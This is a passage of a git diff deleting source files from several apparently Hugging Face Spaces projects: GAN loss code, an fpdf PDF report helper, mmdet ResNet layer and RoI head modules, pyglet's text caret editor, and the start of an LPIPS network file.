d_loss - - -def logistic_loss(fake_pred, real_pred, mode): - if mode == 'd': - # Discriminator update - d_loss_fake = torch.mean(F.softplus(fake_pred)) - d_loss_real = torch.mean(F.softplus(-real_pred)) - d_loss = d_loss_fake + d_loss_real - elif mode == 'g': - # Generator update - d_loss = torch.mean(F.softplus(-fake_pred)) - return d_loss - - -def r1_loss(real_pred, real_img): - (grad_real, ) = autograd.grad(outputs=real_pred.sum(), inputs=real_img, create_graph=True) - grad_penalty = grad_real.pow(2).reshape(grad_real.shape[0], -1).sum(1).mean() - return grad_penalty - - -class GANLoss(nn.Module): - def __init__( - self, - opt, - disc_loss='logistic', - ): - super().__init__() - self.opt = opt.gan - - input_dim = 3 - self.discriminator = StyleDiscriminator(input_dim, self.opt.img_res) - - if disc_loss == 'hinge': - self.disc_loss = hinge_loss - elif disc_loss == 'logistic': - self.disc_loss = logistic_loss - - def forward(self, input): - - disc_in_real = input['norm_real'] - disc_in_fake = input['norm_fake'] - - logits_real = self.discriminator(disc_in_real) - logits_fake = self.discriminator(disc_in_fake) - - disc_loss = self.disc_loss(fake_pred=logits_fake, real_pred=logits_real, mode='d') - - log = { - "disc_loss": disc_loss.detach(), - "logits_real": logits_real.mean().detach(), - "logits_fake": logits_fake.mean().detach(), - } - - return disc_loss * self.opt.lambda_gan, log diff --git 
a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/util/pdf_opt.py b/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/util/pdf_opt.py deleted file mode 100644 index 541e9cdd7b1a2c0017f74eadf11f9a7d713734c3..0000000000000000000000000000000000000000 --- a/spaces/Zengyf-CVer/Gradio_YOLOv5_Det_v3/util/pdf_opt.py +++ /dev/null @@ -1,78 +0,0 @@ -# PDF management -# author: Zeng Yifu -# creation time: 2022-05-05 - -from fpdf import FPDF - - -# PDF generation class -class PDF(FPDF): - # Reference: https://pyfpdf.readthedocs.io/en/latest/Tutorial/index.html - def header(self): - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 16) - # Calculate width of title and position - w = self.get_string_width(title) + 6 - self.set_x((210 - w) / 2) - # Colors of frame, background and text - self.set_draw_color(255, 255, 255) - self.set_fill_color(255, 255, 255) - self.set_text_color(0, 0, 0) - # Thickness of frame (1 mm) - # self.set_line_width(1) - # Title - self.cell(w, 9, title, 1, 1, "C", 1) - # Line break - self.ln(10) - - def footer(self): - # Position at 1.5 cm from bottom - self.set_y(-15) - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 12) - # Text color in gray - self.set_text_color(128) - # Page number - self.cell(0, 10, "Page " + str(self.page_no()), 0, 0, "C") - - def chapter_title(self, num, label): - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 12) - # Background color - self.set_fill_color(200, 220, 255) - # Title - # self.cell(0, 6, 'Chapter %d : %s' % (num, label), 0, 1, 'L', 1) - self.cell(0, 6, "Test result:", 0, 1, "L", 1) - # Line break - self.ln(4) - - def chapter_body(self, name): - - # Set Chinese font - self.add_font("SimSun", "", "./fonts/SimSun.ttf", uni=True) - self.set_font("SimSun", "", 12) - # Output justified text - self.multi_cell(0, 5, name) - # Line break - self.ln() - self.cell(0, 5, "--------------------------------------") - - def print_chapter(self, num, title, name): - self.add_page() - self.chapter_title(num, title) - self.chapter_body(name) - - -# pdf generation function -def pdf_generate(input_file, output_file, title_): - global title - - title = title_ - pdf = PDF() - pdf.set_title(title) - pdf.set_author("Zeng Yifu") - pdf.print_chapter(1, "A RUNAWAY REEF", input_file) - pdf.output(output_file) \ No newline at end of file diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet/models/utils/res_layer.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet/models/utils/res_layer.py deleted file mode 100644 index 4a4efd3dd30b30123ed5135eac080ad9f7f7b448..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet/models/utils/res_layer.py +++ /dev/null @@ -1,187 +0,0 @@ -from mmcv.cnn import build_conv_layer, build_norm_layer -from torch import nn as nn - - -class ResLayer(nn.Sequential): - """ResLayer to build ResNet style backbone. - - Args: - block (nn.Module): block used to build ResLayer. - inplanes (int): inplanes of block. - planes (int): planes of block. - num_blocks (int): number of blocks. - stride (int): stride of the first block. Default: 1 - avg_down (bool): Use AvgPool instead of stride conv when - downsampling in the bottleneck. Default: False - conv_cfg (dict): dictionary to construct and config conv layer. - Default: None - norm_cfg (dict): dictionary to construct and config norm layer. 
- Default: dict(type='BN') - downsample_first (bool): Downsample at the first block or last block. - False for Hourglass, True for ResNet. Default: True - """ - - def __init__(self, - block, - inplanes, - planes, - num_blocks, - stride=1, - avg_down=False, - conv_cfg=None, - norm_cfg=dict(type='BN'), - downsample_first=True, - **kwargs): - self.block = block - - downsample = None - if stride != 1 or inplanes != planes * block.expansion: - downsample = [] - conv_stride = stride - if avg_down: - conv_stride = 1 - downsample.append( - nn.AvgPool2d( - kernel_size=stride, - stride=stride, - ceil_mode=True, - count_include_pad=False)) - downsample.extend([ - build_conv_layer( - conv_cfg, - inplanes, - planes * block.expansion, - kernel_size=1, - stride=conv_stride, - bias=False), - build_norm_layer(norm_cfg, planes * block.expansion)[1] - ]) - downsample = nn.Sequential(*downsample) - - layers = [] - if downsample_first: - layers.append( - block( - inplanes=inplanes, - planes=planes, - stride=stride, - downsample=downsample, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - inplanes = planes * block.expansion - for _ in range(1, num_blocks): - layers.append( - block( - inplanes=inplanes, - planes=planes, - stride=1, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - - else: # downsample_first=False is for HourglassModule - for _ in range(num_blocks - 1): - layers.append( - block( - inplanes=inplanes, - planes=inplanes, - stride=1, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - layers.append( - block( - inplanes=inplanes, - planes=planes, - stride=stride, - downsample=downsample, - conv_cfg=conv_cfg, - norm_cfg=norm_cfg, - **kwargs)) - super(ResLayer, self).__init__(*layers) - - -class SimplifiedBasicBlock(nn.Module): - """Simplified version of original basic residual block. This is used in - `SCNet `_. - - - Norm layer is now optional - - Last ReLU in forward function is removed - """ - expansion = 1 - - def __init__(self, - inplanes, - planes, - stride=1, - dilation=1, - downsample=None, - style='pytorch', - with_cp=False, - conv_cfg=None, - norm_cfg=dict(type='BN'), - dcn=None, - plugins=None): - super(SimplifiedBasicBlock, self).__init__() - assert dcn is None, 'Not implemented yet.' - assert plugins is None, 'Not implemented yet.' - assert not with_cp, 'Not implemented yet.' 
- self.with_norm = norm_cfg is not None - with_bias = True if norm_cfg is None else False - self.conv1 = build_conv_layer( - conv_cfg, - inplanes, - planes, - 3, - stride=stride, - padding=dilation, - dilation=dilation, - bias=with_bias) - if self.with_norm: - self.norm1_name, norm1 = build_norm_layer( - norm_cfg, planes, postfix=1) - self.add_module(self.norm1_name, norm1) - self.conv2 = build_conv_layer( - conv_cfg, planes, planes, 3, padding=1, bias=with_bias) - if self.with_norm: - self.norm2_name, norm2 = build_norm_layer( - norm_cfg, planes, postfix=2) - self.add_module(self.norm2_name, norm2) - - self.relu = nn.ReLU(inplace=True) - self.downsample = downsample - self.stride = stride - self.dilation = dilation - self.with_cp = with_cp - - @property - def norm1(self): - """nn.Module: normalization layer after the first convolution layer""" - return getattr(self, self.norm1_name) if self.with_norm else None - - @property - def norm2(self): - """nn.Module: normalization layer after the second convolution layer""" - return getattr(self, self.norm2_name) if self.with_norm else None - - def forward(self, x): - """Forward function.""" - - identity = x - - out = self.conv1(x) - if self.with_norm: - out = self.norm1(out) - out = self.relu(out) - - out = self.conv2(out) - if self.with_norm: - out = self.norm2(out) - - if self.downsample is not None: - identity = self.downsample(x) - - out += identity - - return out diff --git a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet_null/models/roi_heads/standard_roi_head.py b/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet_null/models/roi_heads/standard_roi_head.py deleted file mode 100644 index c530f2a5ce904439492de12ff7d267cc1e757d3a..0000000000000000000000000000000000000000 --- a/spaces/abhishek/sketch-to-image/annotator/uniformer/mmdet_null/models/roi_heads/standard_roi_head.py +++ /dev/null @@ -1,295 +0,0 @@ -import torch - -from mmdet.core import bbox2result, bbox2roi, build_assigner, build_sampler -from ..builder import HEADS, build_head, build_roi_extractor -from .base_roi_head import BaseRoIHead -from .test_mixins import BBoxTestMixin, MaskTestMixin - - -@HEADS.register_module() -class StandardRoIHead(BaseRoIHead, BBoxTestMixin, MaskTestMixin): - """Simplest base roi head including one bbox head and one mask head.""" - - def init_assigner_sampler(self): - """Initialize assigner and sampler.""" - self.bbox_assigner = None - self.bbox_sampler = None - if self.train_cfg: - self.bbox_assigner = build_assigner(self.train_cfg.assigner) - self.bbox_sampler = build_sampler( - self.train_cfg.sampler, context=self) - - def init_bbox_head(self, bbox_roi_extractor, bbox_head): - """Initialize ``bbox_head``""" - self.bbox_roi_extractor = build_roi_extractor(bbox_roi_extractor) - self.bbox_head = build_head(bbox_head) - - def init_mask_head(self, mask_roi_extractor, mask_head): - """Initialize ``mask_head``""" - if mask_roi_extractor is not None: - self.mask_roi_extractor = build_roi_extractor(mask_roi_extractor) - self.share_roi_extractor = False - else: - self.share_roi_extractor = True - self.mask_roi_extractor = self.bbox_roi_extractor - self.mask_head = build_head(mask_head) - - def init_weights(self, pretrained): - """Initialize the weights in head. - - Args: - pretrained (str, optional): Path to pre-trained weights. - Defaults to None. 
- """ - if self.with_shared_head: - self.shared_head.init_weights(pretrained=pretrained) - if self.with_bbox: - self.bbox_roi_extractor.init_weights() - self.bbox_head.init_weights() - if self.with_mask: - self.mask_head.init_weights() - if not self.share_roi_extractor: - self.mask_roi_extractor.init_weights() - - def forward_dummy(self, x, proposals): - """Dummy forward function.""" - # bbox head - outs = () - rois = bbox2roi([proposals]) - if self.with_bbox: - bbox_results = self._bbox_forward(x, rois) - outs = outs + (bbox_results['cls_score'], - bbox_results['bbox_pred']) - # mask head - if self.with_mask: - mask_rois = rois[:100] - mask_results = self._mask_forward(x, mask_rois) - outs = outs + (mask_results['mask_pred'], ) - return outs - - def forward_train(self, - x, - img_metas, - proposal_list, - gt_bboxes, - gt_labels, - gt_bboxes_ignore=None, - gt_masks=None): - """ - Args: - x (list[Tensor]): list of multi-level img features. - img_metas (list[dict]): list of image info dict where each dict - has: 'img_shape', 'scale_factor', 'flip', and may also contain - 'filename', 'ori_shape', 'pad_shape', and 'img_norm_cfg'. - For details on the values of these keys see - `mmdet/datasets/pipelines/formatting.py:Collect`. - proposals (list[Tensors]): list of region proposals. - gt_bboxes (list[Tensor]): Ground truth bboxes for each image with - shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format. - gt_labels (list[Tensor]): class indices corresponding to each box - gt_bboxes_ignore (None | list[Tensor]): specify which bounding - boxes can be ignored when computing the loss. - gt_masks (None | Tensor) : true segmentation masks for each box - used if the architecture supports a segmentation task. - - Returns: - dict[str, Tensor]: a dictionary of loss components - """ - # assign gts and sample proposals - if self.with_bbox or self.with_mask: - num_imgs = len(img_metas) - if gt_bboxes_ignore is None: - gt_bboxes_ignore = [None for _ in range(num_imgs)] - sampling_results = [] - for i in range(num_imgs): - assign_result = self.bbox_assigner.assign( - proposal_list[i], gt_bboxes[i], gt_bboxes_ignore[i], - gt_labels[i]) - sampling_result = self.bbox_sampler.sample( - assign_result, - proposal_list[i], - gt_bboxes[i], - gt_labels[i], - feats=[lvl_feat[i][None] for lvl_feat in x]) - sampling_results.append(sampling_result) - - losses = dict() - # bbox head forward and loss - if self.with_bbox: - bbox_results = self._bbox_forward_train(x, sampling_results, - gt_bboxes, gt_labels, - img_metas) - losses.update(bbox_results['loss_bbox']) - - # mask head forward and loss - if self.with_mask: - mask_results = self._mask_forward_train(x, sampling_results, - bbox_results['bbox_feats'], - gt_masks, img_metas) - losses.update(mask_results['loss_mask']) - - return losses - - def _bbox_forward(self, x, rois): - """Box head forward function used in both training and testing.""" - # TODO: a more flexible way to decide which feature maps to use - bbox_feats = self.bbox_roi_extractor( - x[:self.bbox_roi_extractor.num_inputs], rois) - if self.with_shared_head: - bbox_feats = self.shared_head(bbox_feats) - cls_score, bbox_pred = self.bbox_head(bbox_feats) - - bbox_results = dict( - cls_score=cls_score, bbox_pred=bbox_pred, bbox_feats=bbox_feats) - return bbox_results - - def _bbox_forward_train(self, x, sampling_results, gt_bboxes, gt_labels, - img_metas): - """Run forward function and calculate loss for box head in training.""" - rois = bbox2roi([res.bboxes for res in sampling_results]) - bbox_results = 
self._bbox_forward(x, rois) - - bbox_targets = self.bbox_head.get_targets(sampling_results, gt_bboxes, - gt_labels, self.train_cfg) - loss_bbox = self.bbox_head.loss(bbox_results['cls_score'], - bbox_results['bbox_pred'], rois, - *bbox_targets) - - bbox_results.update(loss_bbox=loss_bbox) - return bbox_results - - def _mask_forward_train(self, x, sampling_results, bbox_feats, gt_masks, - img_metas): - """Run forward function and calculate loss for mask head in - training.""" - if not self.share_roi_extractor: - pos_rois = bbox2roi([res.pos_bboxes for res in sampling_results]) - mask_results = self._mask_forward(x, pos_rois) - else: - pos_inds = [] - device = bbox_feats.device - for res in sampling_results: - pos_inds.append( - torch.ones( - res.pos_bboxes.shape[0], - device=device, - dtype=torch.uint8)) - pos_inds.append( - torch.zeros( - res.neg_bboxes.shape[0], - device=device, - dtype=torch.uint8)) - pos_inds = torch.cat(pos_inds) - - mask_results = self._mask_forward( - x, pos_inds=pos_inds, bbox_feats=bbox_feats) - - mask_targets = self.mask_head.get_targets(sampling_results, gt_masks, - self.train_cfg) - pos_labels = torch.cat([res.pos_gt_labels for res in sampling_results]) - loss_mask = self.mask_head.loss(mask_results['mask_pred'], - mask_targets, pos_labels) - - mask_results.update(loss_mask=loss_mask, mask_targets=mask_targets) - return mask_results - - def _mask_forward(self, x, rois=None, pos_inds=None, bbox_feats=None): - """Mask head forward function used in both training and testing.""" - assert ((rois is not None) ^ - (pos_inds is not None and bbox_feats is not None)) - if rois is not None: - mask_feats = self.mask_roi_extractor( - x[:self.mask_roi_extractor.num_inputs], rois) - if self.with_shared_head: - mask_feats = self.shared_head(mask_feats) - else: - assert bbox_feats is not None - mask_feats = bbox_feats[pos_inds] - - mask_pred = self.mask_head(mask_feats) - mask_results = dict(mask_pred=mask_pred, mask_feats=mask_feats) - return mask_results - - async def async_simple_test(self, - x, - proposal_list, - img_metas, - proposals=None, - rescale=False): - """Async test without augmentation.""" - assert self.with_bbox, 'Bbox head must be implemented.' - - det_bboxes, det_labels = await self.async_test_bboxes( - x, img_metas, proposal_list, self.test_cfg, rescale=rescale) - bbox_results = bbox2result(det_bboxes, det_labels, - self.bbox_head.num_classes) - if not self.with_mask: - return bbox_results - else: - segm_results = await self.async_test_mask( - x, - img_metas, - det_bboxes, - det_labels, - rescale=rescale, - mask_test_cfg=self.test_cfg.get('mask')) - return bbox_results, segm_results - - def simple_test(self, - x, - proposal_list, - img_metas, - proposals=None, - rescale=False): - """Test without augmentation.""" - assert self.with_bbox, 'Bbox head must be implemented.' 
- - det_bboxes, det_labels = self.simple_test_bboxes( - x, img_metas, proposal_list, self.test_cfg, rescale=rescale) - if torch.onnx.is_in_onnx_export(): - if self.with_mask: - segm_results = self.simple_test_mask( - x, img_metas, det_bboxes, det_labels, rescale=rescale) - return det_bboxes, det_labels, segm_results - else: - return det_bboxes, det_labels - - bbox_results = [ - bbox2result(det_bboxes[i], det_labels[i], - self.bbox_head.num_classes) - for i in range(len(det_bboxes)) - ] - - if not self.with_mask: - return bbox_results - else: - segm_results = self.simple_test_mask( - x, img_metas, det_bboxes, det_labels, rescale=rescale) - return list(zip(bbox_results, segm_results)) - - def aug_test(self, x, proposal_list, img_metas, rescale=False): - """Test with augmentations. - - If rescale is False, then returned bboxes and masks will fit the scale - of imgs[0]. - """ - det_bboxes, det_labels = self.aug_test_bboxes(x, img_metas, - proposal_list, - self.test_cfg) - - if rescale: - _det_bboxes = det_bboxes - else: - _det_bboxes = det_bboxes.clone() - _det_bboxes[:, :4] *= det_bboxes.new_tensor( - img_metas[0][0]['scale_factor']) - bbox_results = bbox2result(_det_bboxes, det_labels, - self.bbox_head.num_classes) - - # det_bboxes always keep the original scale - if self.with_mask: - segm_results = self.aug_test_mask(x, img_metas, det_bboxes, - det_labels) - return [(bbox_results, segm_results)] - else: - return [bbox_results] diff --git a/spaces/abrar-lohia/text-2-character-anim/pyrender/.eggs/pyglet-2.0.5-py3.10.egg/pyglet/text/caret.py b/spaces/abrar-lohia/text-2-character-anim/pyrender/.eggs/pyglet-2.0.5-py3.10.egg/pyglet/text/caret.py deleted file mode 100644 index e78ea645bd0334cf75adfd67ccd2b98853df2b7d..0000000000000000000000000000000000000000 --- a/spaces/abrar-lohia/text-2-character-anim/pyrender/.eggs/pyglet-2.0.5-py3.10.egg/pyglet/text/caret.py +++ /dev/null @@ -1,545 +0,0 @@ -"""Provides keyboard and mouse editing procedures for text layout. - -Example usage:: - - from pyglet import window - from pyglet.text import layout, caret - - my_window = window.Window(...) - my_layout = layout.IncrementalTextLayout(...) - my_caret = caret.Caret(my_layout) - my_window.push_handlers(my_caret) - -.. versionadded:: 1.1 -""" - -import re -import time - -from pyglet import clock -from pyglet import event -from pyglet.window import key - - -class Caret: - """Visible text insertion marker for - `pyglet.text.layout.IncrementalTextLayout`. - - The caret is drawn as a single vertical bar at the document `position` - on a text layout object. If `mark` is not None, it gives the unmoving - end of the current text selection. The visible text selection on the - layout is updated along with `mark` and `position`. - - By default the layout's graphics batch is used, so the caret does not need - to be drawn explicitly. Even if a different graphics batch is supplied, - the caret will be correctly positioned and clipped within the layout. - - Updates to the document (and so the layout) are automatically propagated - to the caret. - - The caret object can be pushed onto a window event handler stack with - `Window.push_handlers`. The caret will respond correctly to keyboard, - text, mouse and activation events, including double- and triple-clicks. - If the text layout is being used alongside other graphical widgets, a - GUI toolkit will be needed to delegate keyboard and mouse events to the - appropriate widget. pyglet does not provide such a toolkit at this stage. 
- """ - - _next_word_re = re.compile(r'(?<=\W)\w') - _previous_word_re = re.compile(r'(?<=\W)\w+\W*$') - _next_para_re = re.compile(r'\n', flags=re.DOTALL) - _previous_para_re = re.compile(r'\n', flags=re.DOTALL) - - _position = 0 - - _active = True - _visible = True - _blink_visible = True - _click_count = 0 - _click_time = 0 - - #: Blink period, in seconds. - PERIOD = 0.5 - - #: Pixels to scroll viewport per mouse scroll wheel movement. - #: Defaults to 12pt at 96dpi. - SCROLL_INCREMENT = 12 * 96 // 72 - - _mark = None - - def __init__(self, layout, batch=None, color=(0, 0, 0)): - """Create a caret for a layout. - - By default the layout's batch is used, so the caret does not need to - be drawn explicitly. - - :Parameters: - `layout` : `~pyglet.text.layout.TextLayout` - Layout to control. - `batch` : `~pyglet.graphics.Batch` - Graphics batch to add vertices to. - `color` : (int, int, int) - RGB tuple with components in range [0, 255]. - - """ - from pyglet import gl - self._layout = layout - batch = batch or layout.batch - group = layout.foreground_decoration_group - colors = (*color, 255, *color, 255) - - self._list = group.program.vertex_list(2, gl.GL_LINES, batch, group, colors=('Bn', colors)) - self._ideal_x = None - self._ideal_line = None - self._next_attributes = {} - - self.visible = True - - layout.push_handlers(self) - - def delete(self): - """Remove the caret from its batch. - - Also disconnects the caret from further layout events. - """ - self._list.delete() - self._layout.remove_handlers(self) - - def _blink(self, dt): - if self.PERIOD: - self._blink_visible = not self._blink_visible - if self._visible and self._active and self._blink_visible: - alpha = 255 - else: - alpha = 0 - self._list.colors[3] = alpha - self._list.colors[7] = alpha - - def _nudge(self): - self.visible = True - - @property - def visible(self): - """Caret visibility. - - The caret may be hidden despite this property due to the periodic blinking - or by `on_deactivate` if the event handler is attached to a window. - - :type: bool - """ - return self._visible - - @visible.setter - def visible(self, visible): - self._visible = visible - clock.unschedule(self._blink) - if visible and self._active and self.PERIOD: - clock.schedule_interval(self._blink, self.PERIOD) - self._blink_visible = False # flipped immediately by next blink - self._blink(0) - - @property - def color(self): - """Caret color. - - The default caret color is ``[0, 0, 0]`` (black). Each RGB color - component is in the range 0 to 255. - - :type: (int, int, int) - """ - return self._list.colors[:3] - - @color.setter - def color(self, color): - self._list.colors[:3] = color - self._list.colors[4:7] = color - - @property - def position(self): - """Position of caret within document.""" - return self._position - - @position.setter - def position(self, position): - self._position = position - self._next_attributes.clear() - self._update() - - @property - def mark(self): - """Position of immovable end of text selection within document. - - An interactive text selection is determined by its immovable end (the - caret's position when a mouse drag begins) and the caret's position, which - moves interactively by mouse and keyboard input. - - This property is ``None`` when there is no selection. 
- - :type: int - """ - return self._mark - - @mark.setter - def mark(self, mark): - self._mark = mark - self._update(line=self._ideal_line) - if mark is None: - self._layout.set_selection(0, 0) - - @property - def line(self): - """Index of line containing the caret's position. - - When set, `position` is modified to place the caret on requested line - while maintaining the closest possible X offset. - - :rtype: int - """ - if self._ideal_line is not None: - return self._ideal_line - else: - return self._layout.get_line_from_position(self._position) - - @line.setter - def line(self, line): - if self._ideal_x is None: - self._ideal_x, _ = self._layout.get_point_from_position(self._position) - self._position = self._layout.get_position_on_line(line, self._ideal_x) - self._update(line=line, update_ideal_x=False) - - def get_style(self, attribute): - """Get the document's named style at the caret's current position. - - If there is a text selection and the style varies over the selection, - `pyglet.text.document.STYLE_INDETERMINATE` is returned. - - :Parameters: - `attribute` : str - Name of style attribute to retrieve. See - `pyglet.text.document` for a list of recognised attribute - names. - - :rtype: object - """ - if self._mark is None or self._mark == self._position: - try: - return self._next_attributes[attribute] - except KeyError: - return self._layout.document.get_style(attribute, self._position) - - start = min(self._position, self._mark) - end = max(self._position, self._mark) - return self._layout.document.get_style_range(attribute, start, end) - - def set_style(self, attributes): - """Set the document style at the caret's current position. - - If there is a text selection the style is modified immediately. - Otherwise, the next text that is entered before the position is - modified will take on the given style. - - :Parameters: - `attributes` : dict - Dict mapping attribute names to style values. See - `pyglet.text.document` for a list of recognised attribute - names. - - """ - - if self._mark is None or self._mark == self._position: - self._next_attributes.update(attributes) - return - - start = min(self._position, self._mark) - end = max(self._position, self._mark) - self._layout.document.set_style(start, end, attributes) - - def _delete_selection(self): - start = min(self._mark, self._position) - end = max(self._mark, self._position) - self._position = start - self._mark = None - self._layout.document.delete_text(start, end) - self._layout.set_selection(0, 0) - - def move_to_point(self, x, y): - """Move the caret close to the given window coordinate. - - The `mark` will be reset to ``None``. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - self._mark = None - self._layout.set_selection(0, 0) - self._position = self._layout.get_position_on_line(line, x) - self._update(line=line) - self._next_attributes.clear() - - def select_to_point(self, x, y): - """Move the caret close to the given window coordinate while - maintaining the `mark`. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - self._position = self._layout.get_position_on_line(line, x) - self._update(line=line) - self._next_attributes.clear() - - def select_word(self, x, y): - """Select the word at the given window coordinate. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. 
- - """ - line = self._layout.get_line_from_point(x, y) - p = self._layout.get_position_on_line(line, x) - m1 = self._previous_word_re.search(self._layout.document.text, 0, p+1) - if not m1: - m1 = 0 - else: - m1 = m1.start() - self.mark = m1 - - m2 = self._next_word_re.search(self._layout.document.text, p) - if not m2: - m2 = len(self._layout.document.text) - else: - m2 = m2.start() - - self._position = m2 - self._update(line=line) - self._next_attributes.clear() - - def select_paragraph(self, x, y): - """Select the paragraph at the given window coordinate. - - :Parameters: - `x` : int - X coordinate. - `y` : int - Y coordinate. - - """ - line = self._layout.get_line_from_point(x, y) - p = self._layout.get_position_on_line(line, x) - self.mark = self._layout.document.get_paragraph_start(p) - self._position = self._layout.document.get_paragraph_end(p) - self._update(line=line) - self._next_attributes.clear() - - def _update(self, line=None, update_ideal_x=True): - if line is None: - line = self._layout.get_line_from_position(self._position) - self._ideal_line = None - else: - self._ideal_line = line - x, y = self._layout.get_point_from_position(self._position, line) - z = self._layout.z - if update_ideal_x: - self._ideal_x = x - - x += self._layout.x - y += self._layout.y + self._layout.height - - font = self._layout.document.get_font(max(0, self._position - 1)) - self._list.position[:] = [x, y + font.descent, z, x, y + font.ascent, z] - - if self._mark is not None: - self._layout.set_selection(min(self._position, self._mark), max(self._position, self._mark)) - - self._layout.ensure_line_visible(line) - self._layout.ensure_x_visible(x) - - def on_layout_update(self): - """Handler for the `IncrementalTextLayout.on_layout_update` event. - """ - if self.position > len(self._layout.document.text): - self.position = len(self._layout.document.text) - self._update() - - def on_text(self, text): - """Handler for the `pyglet.window.Window.on_text` event. - - Caret keyboard handlers assume the layout always has keyboard focus. - GUI toolkits should filter keyboard and text events by widget focus - before invoking this handler. - """ - if self._mark is not None: - self._delete_selection() - - text = text.replace('\r', '\n') - pos = self._position - self._position += len(text) - self._layout.document.insert_text(pos, text, self._next_attributes) - self._nudge() - return event.EVENT_HANDLED - - def on_text_motion(self, motion, select=False): - """Handler for the `pyglet.window.Window.on_text_motion` event. - - Caret keyboard handlers assume the layout always has keyboard focus. - GUI toolkits should filter keyboard and text events by widget focus - before invoking this handler. 
- """ - if motion == key.MOTION_BACKSPACE: - if self.mark is not None: - self._delete_selection() - elif self._position > 0: - self._position -= 1 - self._layout.document.delete_text(self._position, self._position + 1) - self._update() - elif motion == key.MOTION_DELETE: - if self.mark is not None: - self._delete_selection() - elif self._position < len(self._layout.document.text): - self._layout.document.delete_text(self._position, self._position + 1) - elif self._mark is not None and not select: - self._mark = None - self._layout.set_selection(0, 0) - - if motion == key.MOTION_LEFT: - self.position = max(0, self.position - 1) - elif motion == key.MOTION_RIGHT: - self.position = min(len(self._layout.document.text), self.position + 1) - elif motion == key.MOTION_UP: - self.line = max(0, self.line - 1) - elif motion == key.MOTION_DOWN: - line = self.line - if line < self._layout.get_line_count() - 1: - self.line = line + 1 - elif motion == key.MOTION_BEGINNING_OF_LINE: - self.position = self._layout.get_position_from_line(self.line) - elif motion == key.MOTION_END_OF_LINE: - line = self.line - if line < self._layout.get_line_count() - 1: - self._position = self._layout.get_position_from_line(line + 1) - 1 - self._update(line) - else: - self.position = len(self._layout.document.text) - elif motion == key.MOTION_BEGINNING_OF_FILE: - self.position = 0 - elif motion == key.MOTION_END_OF_FILE: - self.position = len(self._layout.document.text) - elif motion == key.MOTION_NEXT_WORD: - pos = self._position + 1 - m = self._next_word_re.search(self._layout.document.text, pos) - if not m: - self.position = len(self._layout.document.text) - else: - self.position = m.start() - elif motion == key.MOTION_PREVIOUS_WORD: - pos = self._position - m = self._previous_word_re.search(self._layout.document.text, 0, pos) - if not m: - self.position = 0 - else: - self.position = m.start() - - self._next_attributes.clear() - self._nudge() - return event.EVENT_HANDLED - - def on_text_motion_select(self, motion): - """Handler for the `pyglet.window.Window.on_text_motion_select` event. - - Caret keyboard handlers assume the layout always has keyboard focus. - GUI toolkits should filter keyboard and text events by widget focus - before invoking this handler. - """ - if self.mark is None: - self.mark = self.position - self.on_text_motion(motion, True) - return event.EVENT_HANDLED - - def on_mouse_scroll(self, x, y, scroll_x, scroll_y): - """Handler for the `pyglet.window.Window.on_mouse_scroll` event. - - Mouse handlers do not check the bounds of the coordinates: GUI - toolkits should filter events that do not intersect the layout - before invoking this handler. - - The layout viewport is scrolled by `SCROLL_INCREMENT` pixels per - "click". - """ - self._layout.view_x -= scroll_x * self.SCROLL_INCREMENT - self._layout.view_y += scroll_y * self.SCROLL_INCREMENT - return event.EVENT_HANDLED - - def on_mouse_press(self, x, y, button, modifiers): - """Handler for the `pyglet.window.Window.on_mouse_press` event. - - Mouse handlers do not check the bounds of the coordinates: GUI - toolkits should filter events that do not intersect the layout - before invoking this handler. - - This handler keeps track of the number of mouse presses within - a short span of time and uses this to reconstruct double- and - triple-click events for selecting words and paragraphs. This - technique is not suitable when a GUI toolkit is in use, as the active - widget must also be tracked. Do not use this mouse handler if - a GUI toolkit is being used. 
- """ - t = time.time() - if t - self._click_time < 0.25: - self._click_count += 1 - else: - self._click_count = 1 - self._click_time = time.time() - - if self._click_count == 1: - self.move_to_point(x, y) - elif self._click_count == 2: - self.select_word(x, y) - elif self._click_count == 3: - self.select_paragraph(x, y) - self._click_count = 0 - - self._nudge() - return event.EVENT_HANDLED - - def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers): - """Handler for the `pyglet.window.Window.on_mouse_drag` event. - - Mouse handlers do not check the bounds of the coordinates: GUI - toolkits should filter events that do not intersect the layout - before invoking this handler. - """ - if self.mark is None: - self.mark = self.position - self.select_to_point(x, y) - self._nudge() - return event.EVENT_HANDLED - - def on_activate(self): - """Handler for the `pyglet.window.Window.on_activate` event. - - The caret is hidden when the window is not active. - """ - self._active = True - self.visible = self._active - return event.EVENT_HANDLED - - def on_deactivate(self): - """Handler for the `pyglet.window.Window.on_deactivate` event. - - The caret is hidden when the window is not active. - """ - self._active = False - self.visible = self._active - return event.EVENT_HANDLED diff --git a/spaces/adirik/stylemc-demo/encoder4editing/criteria/lpips/networks.py b/spaces/adirik/stylemc-demo/encoder4editing/criteria/lpips/networks.py deleted file mode 100644 index 3a0d13ad2d560278f16586da68d3a5eadb26e746..0000000000000000000000000000000000000000 --- a/spaces/adirik/stylemc-demo/encoder4editing/criteria/lpips/networks.py +++ /dev/null @@ -1,96 +0,0 @@ -from typing import Sequence - -from itertools import chain - -import torch -import torch.nn as nn -from torchvision import models - -from criteria.lpips.utils import normalize_activation - - -def get_network(net_type: str): - if net_type == 'alex': - return AlexNet() - elif net_type == 'squeeze': - return SqueezeNet() - elif net_type == 